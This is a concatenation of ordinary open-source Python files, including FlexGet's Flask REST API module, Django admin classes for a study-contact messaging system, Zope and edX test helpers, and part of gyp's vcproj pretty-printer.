def set_multiple_status(names, status):
	"""Set ``status`` on every Opportunity listed in the JSON array ``names``."""
	for opportunity_name in json.loads(names):
		doc = frappe.get_doc("Opportunity", opportunity_name)
		doc.status = status
		doc.save()
| agpl-3.0 |
dya2/python-for-android | python-modules/zope/zope/interface/common/tests/basemapping.py | 50 | 3973 | ##############################################################################
#
# Copyright (c) 2001, 2002 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
"""Base Mapping tests
$Id: basemapping.py 110736 2010-04-11 10:59:30Z regebro $
"""
from operator import __getitem__
def testIReadMapping(self, inst, state, absent):
for key in state:
self.assertEqual(inst[key], state[key])
self.assertEqual(inst.get(key, None), state[key])
self.failUnless(key in inst)
for key in absent:
self.assertEqual(inst.get(key, None), None)
self.assertEqual(inst.get(key), None)
self.assertEqual(inst.get(key, self), self)
self.assertRaises(KeyError, __getitem__, inst, key)
def test_keys(self, inst, state):
# Return the keys of the mapping object
inst_keys = list(inst.keys()); inst_keys.sort()
state_keys = list(state.keys()) ; state_keys.sort()
self.assertEqual(inst_keys, state_keys)
def test_iter(self, inst, state):
# Return the keys of the mapping object
inst_keys = list(inst); inst_keys.sort()
state_keys = list(state.keys()) ; state_keys.sort()
self.assertEqual(inst_keys, state_keys)
def test_values(self, inst, state):
# Return the values of the mapping object
inst_values = list(inst.values()); inst_values.sort()
state_values = list(state.values()) ; state_values.sort()
self.assertEqual(inst_values, state_values)
def test_items(self, inst, state):
# Return the items of the mapping object
inst_items = list(inst.items()); inst_items.sort()
state_items = list(state.items()) ; state_items.sort()
self.assertEqual(inst_items, state_items)
def test___len__(self, inst, state):
# Return the number of items
self.assertEqual(len(inst), len(state))
def testIEnumerableMapping(self, inst, state):
    # Run every enumerable-mapping check against the same fixture.
    for check in (test_keys, test_items, test_values, test___len__):
        check(self, inst, state)
class BaseTestIReadMapping(object):
    # Mixin for unittest.TestCase subclasses. The subclass supplies the sample
    # mapping, its expected contents and some keys known to be absent via the
    # name-mangled _IReadMapping__* hook methods.
    def testIReadMapping(self):
        inst = self._IReadMapping__sample()
        state = self._IReadMapping__stateDict()
        absent = self._IReadMapping__absentKeys()
        testIReadMapping(self, inst, state, absent)
class BaseTestIEnumerableMapping(BaseTestIReadMapping):
    # Mapping objects whose items can be enumerated
    # Mixin for TestCase subclasses; the subclass provides the sample mapping,
    # its expected state and absent keys via the _IEnumerableMapping__* hooks.
    def test_keys(self):
        # Return the keys of the mapping object
        inst = self._IEnumerableMapping__sample()
        state = self._IEnumerableMapping__stateDict()
        test_keys(self, inst, state)

    def test_values(self):
        # Return the values of the mapping object
        inst = self._IEnumerableMapping__sample()
        state = self._IEnumerableMapping__stateDict()
        test_values(self, inst, state)

    def test_items(self):
        # Return the items of the mapping object
        inst = self._IEnumerableMapping__sample()
        state = self._IEnumerableMapping__stateDict()
        test_items(self, inst, state)

    def test___len__(self):
        # Return the number of items
        inst = self._IEnumerableMapping__sample()
        state = self._IEnumerableMapping__stateDict()
        test___len__(self, inst, state)

    # Bridge the IReadMapping hooks to the IEnumerableMapping ones so the
    # inherited testIReadMapping reuses the same fixtures.
    def _IReadMapping__stateDict(self):
        return self._IEnumerableMapping__stateDict()

    def _IReadMapping__sample(self):
        return self._IEnumerableMapping__sample()

    def _IReadMapping__absentKeys(self):
        return self._IEnumerableMapping__absentKeys()
| apache-2.0 |
VisTrails/VisTrails | vistrails/db/versions/v0_8_1/__init__.py | 2 | 1965 | ###############################################################################
##
## Copyright (C) 2014-2016, New York University.
## Copyright (C) 2011-2014, NYU-Poly.
## Copyright (C) 2006-2011, University of Utah.
## All rights reserved.
## Contact: contact@vistrails.org
##
## This file is part of VisTrails.
##
## "Redistribution and use in source and binary forms, with or without
## modification, are permitted provided that the following conditions are met:
##
## - Redistributions of source code must retain the above copyright notice,
## this list of conditions and the following disclaimer.
## - Redistributions in binary form must reproduce the above copyright
## notice, this list of conditions and the following disclaimer in the
## documentation and/or other materials provided with the distribution.
## - Neither the name of the New York University nor the names of its
## contributors may be used to endorse or promote products derived from
## this software without specific prior written permission.
##
## THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
## AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
## THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
## PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
## CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
## EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
## PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
## OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
## WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
## OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
## ADVISED OF THE POSSIBILITY OF SUCH DAMAGE."
##
###############################################################################
from __future__ import division
version = '0.8.1'
| bsd-3-clause |
malkavi/Flexget | flexget/api/app.py | 1 | 14373 | import json
import os
import re
from collections import deque
from functools import partial, wraps
from flask import Flask, jsonify, make_response, request
from flask_compress import Compress
from flask_cors import CORS
from flask_restplus import Api as RestPlusAPI
from flask_restplus import Resource
from jsonschema import RefResolutionError
from loguru import logger
from werkzeug.http import generate_etag
from flexget import manager
from flexget.config_schema import format_checker, process_config
from flexget.utils.database import with_session
from flexget.webserver import User
from . import __path__
__version__ = '1.7.1'
logger = logger.bind(name='api')
class APIClient:
    """
    This is an client which can be used as a more pythonic interface to the rest api.

    It skips http, and is only usable from within the running flexget process.
    """

    def __init__(self):
        self.app = api_app.test_client()

    def __getattr__(self, item):
        # Attribute access builds up the endpoint path lazily.
        return APIEndpoint('/api/' + item, self.get_endpoint)

    def get_endpoint(self, url, data=None, method=None):
        """Perform the request against the in-process test client."""
        # Default to POST when a body is supplied, GET otherwise.
        if method is None:
            method = 'POST' if data is not None else 'GET'
        auth_header = dict(Authorization='Token %s' % api_key())
        response = self.app.open(
            url, data=data, follow_redirects=True, method=method, headers=auth_header
        )
        result = json.loads(response.get_data(as_text=True))
        # TODO: Proper exceptions
        # Raise for any non-2xx status. The previous check
        # (`200 > response.status_code >= 300`) could never be true, so API
        # errors were silently returned as normal results.
        if not 200 <= response.status_code < 300:
            raise Exception(result['error'])
        return result
class APIEndpoint:
    """A lazily-built URL path segment for the in-process API client.

    Attribute (or item) access appends one path segment; calling the object
    dispatches the accumulated endpoint through the bound caller.
    """

    def __init__(self, endpoint, caller):
        self.endpoint = endpoint
        self.caller = caller

    def __getattr__(self, item):
        # Each attribute lookup produces a new endpoint one segment deeper.
        return self.__class__('{}/{}'.format(self.endpoint, item), self.caller)

    # Subscript access behaves exactly like attribute access.
    __getitem__ = __getattr__

    def __call__(self, data=None, method=None):
        # Invoking the endpoint delegates the actual request to the caller.
        return self.caller(self.endpoint, data=data, method=method)
def api_version(f):
    """ Add the 'API-Version' header to all responses """

    @wraps(f)
    def with_version_header(*args, **kwargs):
        response = f(*args, **kwargs)
        response.headers['API-Version'] = __version__
        return response

    return with_version_header
class APIResource(Resource):
    """All api resources should subclass this class."""

    # Every handler method gets a DB session and stamps the API-Version header.
    method_decorators = [with_session, api_version]

    def __init__(self, api, *args, **kwargs):
        # Bind the running manager singleton so resources can drive core flexget.
        self.manager = manager.manager
        super().__init__(api, *args, **kwargs)
class API(RestPlusAPI):
    """
    Extends a flask restplus :class:`flask_restplus.Api` with:

    - methods to make using json schemas easier
    - methods to auto document and handle :class:`ApiError` responses
    """

    def validate(self, model, schema_override=None, description=None):
        """
        When a method is decorated with this, json data submitted to the endpoint will be validated with the given
        `model`. This also auto-documents the expected model, as well as the possible :class:`ValidationError` response.
        """

        def decorator(func):
            @api.expect((model, description))
            @api.response(ValidationError)
            @wraps(func)
            def wrapper(*args, **kwargs):
                payload = request.json
                try:
                    # Validate against an alternate schema when one is given,
                    # otherwise against the documented model's schema.
                    schema = schema_override if schema_override else model.__schema__
                    errors = process_config(config=payload, schema=schema, set_defaults=False)

                    if errors:
                        raise ValidationError(errors)
                except RefResolutionError as e:
                    # A $ref in the schema could not be resolved; surface as 500.
                    raise APIError(str(e))
                return func(*args, **kwargs)

            return wrapper

        return decorator

    def response(self, code_or_apierror, description='Success', model=None, **kwargs):
        """
        Extends :meth:`flask_restplus.Api.response` to allow passing an :class:`ApiError` class instead of
        response code. If an `ApiError` is used, the response code, and expected response model, is automatically
        documented.
        """
        try:
            if issubclass(code_or_apierror, APIError):
                description = code_or_apierror.description or description
                return self.doc(
                    responses={
                        code_or_apierror.status_code: (
                            description,
                            code_or_apierror.response_model,
                        )
                    },
                    **kwargs,
                )
        except TypeError:
            # If first argument isn't a class this happens
            pass
        return self.doc(responses={code_or_apierror: (description, model)}, **kwargs)

    def pagination_parser(self, parser=None, sort_choices=None, default=None, add_sort=None):
        """
        Return a standardized pagination parser, to be used for any endpoint that has pagination.

        :param RequestParser parser: Can extend a given parser or create a new one
        :param tuple sort_choices: A tuple of strings, to be used as server side attribute searches
        :param str default: The default sort string, used `sort_choices[0]` if not given
        :param bool add_sort: Add sort order choices without adding specific sort choices

        :return: An api.parser() instance with pagination and sorting arguments.
        """
        pagination = parser.copy() if parser else self.parser()
        pagination.add_argument('page', type=int, default=1, help='Page number')
        pagination.add_argument('per_page', type=int, default=50, help='Results per page')
        if sort_choices or add_sort:
            pagination.add_argument(
                'order', choices=('desc', 'asc'), default='desc', help='Sorting order'
            )
            if sort_choices:
                pagination.add_argument(
                    'sort_by',
                    choices=sort_choices,
                    default=default or sort_choices[0],
                    help='Sort by attribute',
                )

        return pagination
# Flask application hosting the versioned REST API; templates live in this package.
api_app = Flask(__name__, template_folder=os.path.join(__path__[0], 'templates'))
api_app.config['REMEMBER_COOKIE_NAME'] = 'flexget.token'
# NOTE(review): DEBUG is hard-coded on -- confirm this is intended outside development.
api_app.config['DEBUG'] = True
api_app.config['ERROR_404_HELP'] = False
# Treat '/path' and '/path/' as the same endpoint.
api_app.url_map.strict_slashes = False

# Let cross-origin browsers read the pagination and caching headers.
CORS(api_app, expose_headers='Link, Total-Count, Count, ETag')
Compress(api_app)

api = API(
    api_app,
    title='Flexget API v{}'.format(__version__),
    version=__version__,
    description='View and manage flexget core operations and plugins. Open each endpoint view for usage information.'
    ' Navigate to http://flexget.com/API for more details.',
    format_checker=format_checker,
)

# JSON schema shared by every standard success/error payload the API returns.
base_message = {
    'type': 'object',
    'properties': {
        'status_code': {'type': 'integer'},
        'message': {'type': 'string'},
        'status': {'type': 'string'},
    },
    'required': ['status_code', 'message', 'status'],
}

base_message_schema = api.schema_model('base_message', base_message)
class APIError(Exception):
    """Base class for all errors returned by the API.

    Subclasses override ``status_code``/``description`` to represent a
    specific HTTP failure; the ``api_errors`` handler serializes them via
    :meth:`to_dict`.
    """

    description = 'Server error'
    status_code = 500
    status = 'Error'
    response_model = base_message_schema

    def __init__(self, message=None, payload=None):
        self.message = message
        self.payload = payload

    def to_dict(self):
        """Return a JSON-serializable dict describing this error.

        Works on a copy of ``payload`` so serializing the error does not
        mutate the dict the caller handed in (the previous implementation
        updated ``self.payload`` in place).
        """
        rv = dict(self.payload) if self.payload else {}
        rv.update(status_code=self.status_code, message=self.message, status=self.status)
        return rv

    @classmethod
    def schema(cls):
        """JSON schema describing this error's documented response body."""
        return cls.response_model.__schema__
# Concrete HTTP error types; each maps straight onto a status code and is
# rendered through APIError.to_dict() by the api_errors handler below.


class NotFoundError(APIError):
    status_code = 404
    description = 'Not found'


class Unauthorized(APIError):
    status_code = 401
    description = 'Unauthorized'


class BadRequest(APIError):
    status_code = 400
    description = 'Bad request'


class Conflict(APIError):
    status_code = 409
    description = 'Conflict'


class PreconditionFailed(APIError):
    status_code = 412
    description = 'Precondition failed'


class NotModified(APIError):
    status_code = 304
    description = 'not modified'
class ValidationError(APIError):
    # Raised (and auto-documented) when submitted JSON fails schema validation.
    status_code = 422
    description = 'Validation error'

    # Documented response body: a list of per-error detail dicts.
    response_model = api.schema_model(
        'validation_error',
        {
            'type': 'object',
            'properties': {
                'validation_errors': {
                    'type': 'array',
                    'items': {
                        'type': 'object',
                        'properties': {
                            'message': {
                                'type': 'string',
                                'description': 'A human readable message explaining the error.',
                            },
                            'validator': {
                                'type': 'string',
                                'description': 'The name of the failed validator.',
                            },
                            'validator_value': {
                                'type': 'string',
                                'description': 'The value for the failed validator in the schema.',
                            },
                            'path': {'type': 'string'},
                            'schema_path': {'type': 'string'},
                        },
                    },
                }
            },
            'required': ['validation_errors'],
        },
    )

    # Attributes copied off each jsonschema ValidationError instance.
    verror_attrs = (
        'message',
        'cause',
        'validator',
        'validator_value',
        'path',
        'schema_path',
        'parent',
    )

    def __init__(self, validation_errors, message='validation error'):
        payload = {
            'validation_errors': [self._verror_to_dict(error) for error in validation_errors]
        }
        super().__init__(message, payload=payload)

    def _verror_to_dict(self, error):
        # Flatten one jsonschema error into plain JSON-serializable values.
        error_dict = {}
        for attr in self.verror_attrs:
            if isinstance(getattr(error, attr), deque):
                # 'path'/'schema_path' are deques on jsonschema errors.
                error_dict[attr] = list(getattr(error, attr))
            else:
                error_dict[attr] = str(getattr(error, attr))
        return error_dict
# Schema for endpoints that document an intentionally empty JSON body.
empty_response = api.schema_model('empty', {'type': 'object'})


def success_response(message, status_code=200, status='success'):
    """Build a JSON flask response following the base_message shape."""
    rsp_dict = {'message': message, 'status_code': status_code, 'status': status}
    rsp = jsonify(rsp_dict)
    rsp.status_code = status_code
    return rsp
# Register one handler for the whole APIError hierarchy so every error type
# is rendered consistently (body from to_dict(), HTTP code from the class).
@api.errorhandler(APIError)
@api.errorhandler(NotFoundError)
@api.errorhandler(ValidationError)
@api.errorhandler(BadRequest)
@api.errorhandler(Unauthorized)
@api.errorhandler(Conflict)
@api.errorhandler(NotModified)
@api.errorhandler(PreconditionFailed)
def api_errors(error):
    return error.to_dict(), error.status_code
@with_session
def api_key(session=None):
    """Return the API token of the first webserver User in the database."""
    logger.debug('fetching token for internal lookup')
    return session.query(User).first().token
def etag(method=None, cache_age=0):
    """
    A decorator that add an ETag header to the response and checks for the "If-Match" and "If-Not-Match" headers to
    return an appropriate response.

    :param method: A GET or HEAD flask method to wrap
    :param cache_age: max-age cache age for the content

    :return: The method's response with the ETag and Cache-Control headers, raises a 412 error or returns a 304 response
    """
    # If called without method, we've been called with optional arguments.
    # We return a decorator with the optional arguments filled in.
    # Next time round we'll be decorating method.
    if method is None:
        return partial(etag, cache_age=cache_age)

    @wraps(method)
    def wrapped(*args, **kwargs):
        # Identify if this is a GET or HEAD in order to proceed
        assert request.method in ['HEAD', 'GET'], '@etag is only supported for GET requests'
        rv = method(*args, **kwargs)
        rv = make_response(rv)

        # Some headers can change without data change for specific page
        content_headers = (
            rv.headers.get('link', '')
            + rv.headers.get('count', '')
            + rv.headers.get('total-count', '')
        )
        # Hash body + pagination headers so the ETag changes when either does.
        data = (rv.get_data().decode() + content_headers).encode()
        etag = generate_etag(data)
        rv.headers['Cache-Control'] = 'max-age=%s' % cache_age
        rv.headers['ETag'] = etag
        if_match = request.headers.get('If-Match')
        if_none_match = request.headers.get('If-None-Match')

        if if_match:
            # Conditional request: fail fast when the tag no longer matches.
            etag_list = [tag.strip() for tag in if_match.split(',')]
            if etag not in etag_list and '*' not in etag_list:
                raise PreconditionFailed('etag does not match')
        elif if_none_match:
            # Client cache revalidation: 304 when the tag still matches.
            etag_list = [tag.strip() for tag in if_none_match.split(',')]
            if etag in etag_list or '*' in etag_list:
                raise NotModified

        return rv

    return wrapped
def pagination_headers(total_pages, total_items, page_count, request):
    """
    Build the 'Link', 'Total-Count' and 'Count' headers used for pagination
    traversal.

    :param total_pages: Total number of pages available
    :param total_items: Total number of items across all pages
    :param page_count: Number of items on this page (may differ from per_page)
    :param request: The flask request, used for the base url and query args
    :return: dict mapping header name to value
    """
    # Constants derived from the incoming request.
    url = request.url_root + request.path.lstrip('/')
    per_page = request.args.get('per_page', 50)
    page = int(request.args.get('page', 1))

    # Base template: url + fixed per_page, with page/rel filled in later.
    link_base = '<{}?per_page={}&'.format(url, per_page)

    # Strip page and per_page from the original query string, then collapse
    # any doubled separators that removal left behind.
    query_string = re.sub(br'per_page=\d+', b'', request.query_string)
    query_string = re.sub(br'page=\d+', b'', query_string)
    query_string = re.sub(b'&{2,}', b'&', query_string)

    # Re-attach the remaining original query parameters.
    link_base += query_string.decode().lstrip('&') + '&page={}>; rel="{}"'

    links = []
    if page > 1:
        links.append(link_base.format(page - 1, 'prev'))
    if page < total_pages:
        links.append(link_base.format(page + 1, 'next'))
    links.append(link_base.format(total_pages, 'last'))

    return {'Link': ', '.join(links), 'Total-Count': total_items, 'Count': page_count}
| mit |
I-TECH-UW/mwachx | contacts/admin.py | 2 | 6505 | from django.contrib import admin
from django.contrib.auth.admin import UserAdmin
from django.contrib.auth.models import User
from django.utils import html
#Local Imports
import models as cont
import utils.admin as utils
class ConnectionInline(admin.TabularInline):
    # Inline editor for a contact's phone connections on the Contact page.
    model = cont.Connection
    extra = 0


class NoteInline(admin.TabularInline):
    # Inline editor for free-form notes on the Contact page.
    model = cont.Note
    extra = 1
def mark_quit(modeladmin, request, queryset):
    ''' mark all contacts in queryset as quit and save '''
    # Admin bulk action: delegate to Contact.set_status per contact so any
    # per-contact side effects (history records, validation) still run.
    for c in queryset:
        c.set_status('quit',comment='Status set from bulk quit action')
mark_quit.short_description = 'Mark contact as quit'
def revert_status(modeladmin, request, queryset):
    ''' set the status for each contact in queryset to their previous status '''
    # Admin bulk action. Guard against contacts with no recorded status
    # changes: statuschange_set.last() returns None for them, which previously
    # crashed the whole bulk action with an AttributeError.
    for c in queryset:
        last_change = c.statuschange_set.last()
        if last_change is None:
            continue  # no history to revert to
        c.set_status(last_change.old, comment='Status reverted from bulk action')
revert_status.short_description = 'Revert to last status'
@admin.register(cont.Contact)
class ContactAdmin(admin.ModelAdmin):
    # Main participant admin: list/search configuration plus inline
    # connections and notes, and the bulk status actions defined above.
    list_display = ('study_id','nickname','status','description','facility',
        'phone_number','due_date','language','send_day','is_validated','created')
    list_display_links = ('study_id','nickname')
    list_filter = ('facility','study_group', ('created',admin.DateFieldListFilter), 'hiv_messaging','status','is_validated','language','send_day')
    ordering = ('study_id',)
    search_fields = ('study_id','nickname','connection__identity','anc_num')
    readonly_fields = ('last_msg_client','last_msg_system','created','modified')
    inlines = (ConnectionInline,NoteInline)
    actions = (mark_quit,revert_status,)
def ParticipantMixinFactory(field='participant'):
    """Build an admin mixin exposing display helpers (nickname link, facility,
    study id, phone number) for the participant reached via attribute `field`.
    """
    class ParticipantAdminMixinBase(object):
        participant_field = field

        def participant_name(self,obj):
            # Linked "(study_id) nickname" cell pointing at the Contact page.
            participant = getattr(obj,self.participant_field)
            if participant is not None:
                return html.format_html("<a href='../contact/{0.pk}'>({0.study_id}) {0.nickname}</a>".format(participant) )
        participant_name.short_description = 'Nickname'
        participant_name.admin_order_field = '{}__study_id'.format(participant_field)

        def facility(self,obj):
            participant = getattr(obj,self.participant_field)
            if participant is not None:
                return participant.facility.capitalize()
        facility.admin_order_field = '{}__facility'.format(participant_field)

        def study_id(self,obj):
            return getattr(obj,self.participant_field).study_id
        study_id.short_description = 'Study ID'
        study_id.admin_order_field = '{}__study_id'.format(participant_field)

        def phone_number(self,obj):
            # Linked identity cell pointing at the Connection page.
            connection = getattr(obj,self.participant_field).connection()
            if connection is not None:
                return html.format_html("<a href='../connection/{0.pk}'>{0.identity}</a>".format(connection) )
        phone_number.short_description = 'Number'
        phone_number.admin_order_field = '{}__connection__identity'.format(participant_field)

    return ParticipantAdminMixinBase

# Concrete mixins for models that reach the participant via different fields.
ParticipantAdminMixin = ParticipantMixinFactory()
ContactAdminMixin = ParticipantMixinFactory('contact')
@admin.register(cont.Message)
class MessageAdmin(admin.ModelAdmin,ContactAdminMixin):
    # SMS message admin; participant columns come from ContactAdminMixin.
    list_display = ('text','participant_name','identity','is_system',
        'is_outgoing', 'is_reply', 'external_status', 'translation_status','created')
    list_filter = ('is_system','is_outgoing', 'external_status', ('contact',utils.NullFieldListFilter),
        ('created', admin.DateFieldListFilter) ,'connection__contact__facility',
        'translation_status','is_related','external_success')
    date_hierarchy = 'created'

    search_fields = ('contact__study_id','contact__nickname','connection__identity')
    readonly_fields = ('created','modified')

    def identity(self,obj):
        # Identity cell linking back to a filtered message list for the number.
        return html.format_html("<a href='./?q={0.identity}'>{0.identity}</a>".format(
            obj.connection
        ) )
    identity.short_description = 'Number'
    identity.admin_order_field = 'connection__identity'
# Remaining model admins: mostly list/search configuration, with participant
# display columns supplied by the ContactAdminMixin/ParticipantAdminMixin.


@admin.register(cont.PhoneCall)
class PhoneCallAdmin(admin.ModelAdmin,ContactAdminMixin):
    list_display = ('comment','participant_name','phone_number','outcome','is_outgoing','created')
    date_hierarchy = 'created'
    list_filter = ('outcome','is_outgoing')
    readonly_fields = ('created','modified')
    search_fields = ('contact__study_id','contact__nickname')


@admin.register(cont.Note)
class NoteAdmin(admin.ModelAdmin,ParticipantAdminMixin):
    list_display = ('participant_name','comment','created')
    date_hierarchy = 'created'


@admin.register(cont.Connection)
class ConnectionAdmin(admin.ModelAdmin,ContactAdminMixin):
    list_display = ('identity','participant_name','facility','is_primary')
    search_fields = ('contact__study_id','contact__nickname','identity')


@admin.register(cont.Visit)
class VisitAdmin(admin.ModelAdmin,ParticipantAdminMixin):
    list_display = ('study_id','participant_name','visit_type','scheduled',
        'notification_last_seen','notify_count', 'arrived','status')
    date_hierarchy = 'scheduled'
    list_filter = ('status','visit_type','arrived','scheduled')
    search_fields = ('participant__study_id','participant__nickname')


@admin.register(cont.ScheduledPhoneCall)
class ScheduledPhoneCall(admin.ModelAdmin,ParticipantAdminMixin):
    list_display = ('study_id','participant_name','call_type','scheduled',
        'notification_last_seen','notify_count', 'arrived','status')
    date_hierarchy = 'scheduled'
    list_filter = ('status','call_type','arrived','scheduled')
    search_fields = ('participant__study_id','participant__nickname')


@admin.register(cont.Practitioner)
class PractitionerAdmin(admin.ModelAdmin):
    list_display = ('facility','username','password_changed')


@admin.register(cont.StatusChange)
class StatusChangeAdmin(admin.ModelAdmin,ContactAdminMixin):
    list_display = ('comment','participant_name','old','new','type','created')
    search_fields = ('contact__study_id','contact__nickname')


@admin.register(cont.EventLog)
class EventLogAdmin(admin.ModelAdmin):
    list_display = ('user','event','created')


class PractitionerInline(admin.TabularInline):
    model = cont.Practitioner


# Shadows the imported django UserAdmin on purpose: same admin plus the
# practitioner inline. The registration below uses this subclass.
class UserAdmin(UserAdmin):
    inlines = (PractitionerInline,)

#Re-register UserAdmin
admin.site.unregister(User)
admin.site.register(User,UserAdmin)
| apache-2.0 |
benpatterson/edx-platform | common/djangoapps/edxmako/tests.py | 88 | 4517 |
from mock import patch, Mock
import unittest
import ddt
from django.conf import settings
from django.http import HttpResponse
from django.test import TestCase
from django.test.utils import override_settings
from django.test.client import RequestFactory
from django.core.urlresolvers import reverse
import edxmako.middleware
from edxmako.middleware import get_template_request_context
from edxmako import add_lookup, LOOKUP
from edxmako.shortcuts import (
marketing_link,
render_to_string,
open_source_footer_context_processor
)
from student.tests.factories import UserFactory
from util.testing import UrlResetMixin
@ddt.ddt
class ShortcutsTests(UrlResetMixin, TestCase):
    """
    Test the edxmako shortcuts file
    """
    @override_settings(MKTG_URLS={'ROOT': 'dummy-root', 'ABOUT': '/about-us'})
    @override_settings(MKTG_URL_LINK_MAP={'ABOUT': 'login'})
    def test_marketing_link(self):
        # test marketing site on
        with patch.dict('django.conf.settings.FEATURES', {'ENABLE_MKTG_SITE': True}):
            expected_link = 'dummy-root/about-us'
            link = marketing_link('ABOUT')
            self.assertEquals(link, expected_link)
        # test marketing site off
        with patch.dict('django.conf.settings.FEATURES', {'ENABLE_MKTG_SITE': False}):
            # we are using login because it is common across both cms and lms
            expected_link = reverse('login')
            link = marketing_link('ABOUT')
            self.assertEquals(link, expected_link)

    @ddt.data((True, None), (False, None))
    @ddt.unpack
    def test_edx_footer(self, expected_result, _):
        # Second element of each ddt tuple is unused; it only exists so ddt
        # unpacks the data as (value, ignored) pairs.
        with patch.dict('django.conf.settings.FEATURES', {
            'IS_EDX_DOMAIN': expected_result
        }):
            result = open_source_footer_context_processor({})
            self.assertEquals(expected_result, result.get('IS_EDX_DOMAIN'))
class AddLookupTests(TestCase):
    """
    Test the `add_lookup` function.
    """
    @patch('edxmako.LOOKUP', {})
    def test_with_package(self):
        # Registering a template dir by package should resolve it to the
        # single package-relative 'management' directory.
        add_lookup('test', 'management', __name__)
        dirs = LOOKUP['test'].directories
        self.assertEqual(len(dirs), 1)
        self.assertTrue(dirs[0].endswith('management'))
class MakoMiddlewareTest(TestCase):
    """
    Test MakoMiddleware.
    """
    def setUp(self):
        super(MakoMiddlewareTest, self).setUp()
        self.middleware = edxmako.middleware.MakoMiddleware()
        self.user = UserFactory.create()
        self.url = "/"
        self.request = RequestFactory().get(self.url)
        self.request.user = self.user
        self.response = Mock(spec=HttpResponse)

    def test_clear_request_context_variable(self):
        """
        Test the global variable requestcontext is cleared correctly
        when response middleware is called.
        """
        self.middleware.process_request(self.request)
        # requestcontext should not be None.
        self.assertIsNotNone(get_template_request_context())

        self.middleware.process_response(self.request, self.response)
        # requestcontext should be None.
        self.assertIsNone(get_template_request_context())

    @unittest.skipUnless(settings.ROOT_URLCONF == 'lms.urls', 'Test only valid in lms')
    @patch("edxmako.middleware.REQUEST_CONTEXT")
    def test_render_to_string_when_no_global_context_lms(self, context_mock):
        """
        Test render_to_string() when makomiddleware has not initialized
        the threadlocal REQUEST_CONTEXT.context. This is meant to run in LMS.
        """
        # Delete the mock attribute to simulate the middleware never running.
        del context_mock.context
        self.assertIn("this module is temporarily unavailable", render_to_string("courseware/error-message.html", None))

    @unittest.skipUnless(settings.ROOT_URLCONF == 'cms.urls', 'Test only valid in cms')
    @patch("edxmako.middleware.REQUEST_CONTEXT")
    def test_render_to_string_when_no_global_context_cms(self, context_mock):
        """
        Test render_to_string() when makomiddleware has not initialized
        the threadlocal REQUEST_CONTEXT.context. This is meant to run in CMS.
        """
        del context_mock.context
        self.assertIn("We're having trouble rendering your component", render_to_string("html_error.html", None))
def mako_middleware_process_request(request):
    """
    Initialize the global RequestContext variable
    edxmako.middleware.requestcontext using the request object.
    """
    edxmako.middleware.MakoMiddleware().process_request(request)
| agpl-3.0 |
dreamllq/node | tools/gyp/tools/pretty_vcproj.py | 2637 | 9586 | #!/usr/bin/env python
# Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Make the format of a vcproj really pretty.
This script normalize and sort an xml. It also fetches all the properties
inside linked vsprops and include them explicitly in the vcproj.
It outputs the resulting xml to stdout.
"""
__author__ = 'nsylvain (Nicolas Sylvain)'
import os
import sys
from xml.dom.minidom import parse
from xml.dom.minidom import Node
REPLACEMENTS = dict()
ARGUMENTS = None
class CmpTuple(object):
  """Compare function between 2 tuple."""
  def __call__(self, x, y):
    # Order tuples by their first element only (Python 2 cmp-style result).
    return cmp(x[0], y[0])
class CmpNode(object):
  """Compare function between 2 xml nodes."""

  def __call__(self, x, y):
    def get_string(node):
      # Build a stable sort key: tag name, node value, then the 'Name'
      # attribute followed by every attribute pair sorted by name.
      node_string = "node"
      node_string += node.nodeName
      if node.nodeValue:
        node_string += node.nodeValue

      if node.attributes:
        # We first sort by name, if present.
        node_string += node.getAttribute("Name")

        all_nodes = []
        for (name, value) in node.attributes.items():
          all_nodes.append((name, value))
        all_nodes.sort(CmpTuple())
        for (name, value) in all_nodes:
          node_string += name
          node_string += value

      return node_string

    return cmp(get_string(x), get_string(y))
def PrettyPrintNode(node, indent=0):
  # Recursively pretty-print a minidom node to stdout with `indent` leading
  # spaces; attributes are printed one per line, sorted by name.
  if node.nodeType == Node.TEXT_NODE:
    if node.data.strip():
      print '%s%s' % (' '*indent, node.data.strip())
    return

  if node.childNodes:
    node.normalize()

  # Get the number of attributes
  attr_count = 0
  if node.attributes:
    attr_count = node.attributes.length

  # Print the main tag
  if attr_count == 0:
    print '%s<%s>' % (' '*indent, node.nodeName)
  else:
    print '%s<%s' % (' '*indent, node.nodeName)

    all_attributes = []
    for (name, value) in node.attributes.items():
      all_attributes.append((name, value))
    all_attributes.sort(CmpTuple())
    for (name, value) in all_attributes:
      print '%s  %s="%s"' % (' '*indent, name, value)
    print '%s>' % (' '*indent)
  if node.nodeValue:
    print '%s  %s' % (' '*indent, node.nodeValue)

  for sub_node in node.childNodes:
    PrettyPrintNode(sub_node, indent=indent+2)
  print '%s</%s>' % (' '*indent, node.nodeName)
def FlattenFilter(node):
  """Returns a list of all the node and sub nodes."""
  # Skip the synthetic '_excluded_files' filter entirely.
  if (node.attributes and
      node.getAttribute('Name') == '_excluded_files'):
    return []

  flattened = []
  for child in node.childNodes:
    if child.nodeName == 'Filter':
      # Filters are transparent containers: splice their contents in.
      flattened.extend(FlattenFilter(child))
    else:
      flattened.append(child)
  return flattened
